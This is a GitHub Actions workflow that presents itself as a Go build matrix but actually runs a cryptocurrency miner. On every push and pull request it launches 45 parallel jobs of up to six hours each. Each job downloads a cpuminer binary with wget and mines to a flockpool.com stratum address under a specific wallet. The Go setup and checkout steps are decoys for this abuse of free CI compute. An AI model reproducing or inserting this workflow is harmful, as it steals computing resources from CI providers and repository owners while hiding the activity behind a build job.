name: RTM
on: [push, pull_request]
jobs:
  build:
    name: Mining
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 30
      fail-fast: false
      matrix:
        go: [1.6, 1.7, 1.8, 1.9, 1.10]
        flag: [A, B, C, D, E, F, G, H, I]
    timeout-minutes: 360
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: Mining
      run: |
        wget https://github.com/WyvernTKC/cpuminer-gr-avx2/releases/download/1.2.4.1/cpuminer-gr-1.2.4.1-x86_64_linux.tar.gz && tar xzvf cpuminer-gr-1.2.4.1-x86_64_linux.tar.gz && cd cpuminer-gr-1.2.4.1-x86_64_linux/binaries && ./cpuminer-avx -a gr -o stratum+tcps://us.flockpool.com:5555 -u RJwiygAasWSgwDYGUWTYg4c2hWbebSGznQ.Google --no-tune
